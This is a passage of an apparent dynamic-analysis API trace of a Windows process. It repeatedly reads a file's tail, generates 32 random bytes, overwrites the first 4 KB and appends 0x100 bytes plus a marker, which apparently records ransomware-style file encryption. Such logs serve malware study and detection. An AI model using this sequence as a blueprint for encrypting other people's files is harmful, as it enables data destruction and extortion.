hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.237] GetProcessHeap () returned 0x4f10000 [0082.237] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.238] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.238] SetFilePointerEx (in: hFile=0x8b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.238] WriteFile (in: hFile=0x8b8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.238] WriteFile (in: hFile=0x8b8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.238] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.238] GetProcessHeap () returned 0x4f10000 [0082.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.239] GetProcessHeap () returned 0x4f10000 [0082.239] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.239] CloseHandle (hObject=0x8b8) returned 1 [0082.240] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 79 [0082.240] SetFilePointerEx (in: hFile=0x8bc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.240] ReadFile (in: hFile=0x8bc, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.240] SetFilePointerEx (in: hFile=0x8bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.240] GetProcessHeap () returned 0x4f10000 [0082.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.240] GetProcessHeap () returned 0x4f10000 [0082.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.240] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.240] GetProcessHeap () returned 0x4f10000 [0082.240] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.240] ReadFile (in: hFile=0x8bc, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.288] SetFilePointerEx (in: hFile=0x8bc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.288] WriteFile (in: hFile=0x8bc, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.288] GetProcessHeap () returned 0x4f10000 [0082.288] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.288] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.289] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.289] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.290] GetProcessHeap () returned 0x4f10000 [0082.290] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.291] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.291] GetProcessHeap () returned 0x4f10000 [0082.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.292] GetProcessHeap () returned 0x4f10000 [0082.292] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.293] GetProcessHeap () returned 0x4f10000 [0082.293] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.293] SetFilePointerEx (in: hFile=0x8bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.293] WriteFile (in: hFile=0x8bc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.294] WriteFile (in: hFile=0x8bc, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.294] GetProcessHeap () returned 0x4f10000 [0082.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.294] GetProcessHeap () returned 0x4f10000 [0082.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.294] GetProcessHeap () returned 0x4f10000 [0082.294] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.294] CloseHandle (hObject=0x8bc) returned 1 [0082.295] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 80 [0082.295] SetFilePointerEx (in: hFile=0x8c0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.295] ReadFile (in: hFile=0x8c0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.295] SetFilePointerEx (in: hFile=0x8c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.295] GetProcessHeap () returned 0x4f10000 [0082.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.295] GetProcessHeap () returned 0x4f10000 [0082.295] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.295] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.296] GetProcessHeap () returned 0x4f10000 [0082.296] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.296] ReadFile (in: hFile=0x8c0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.344] SetFilePointerEx (in: hFile=0x8c0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.344] WriteFile (in: hFile=0x8c0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.344] GetProcessHeap () returned 0x4f10000 [0082.344] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.344] GetProcessHeap () returned 0x4f10000 [0082.344] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.344] GetProcessHeap () returned 0x4f10000 [0082.344] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.344] GetProcessHeap () returned 0x4f10000 [0082.344] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.344] GetProcessHeap () returned 0x4f10000 [0082.345] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.345] GetProcessHeap () returned 0x4f10000 [0082.345] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.345] GetProcessHeap () returned 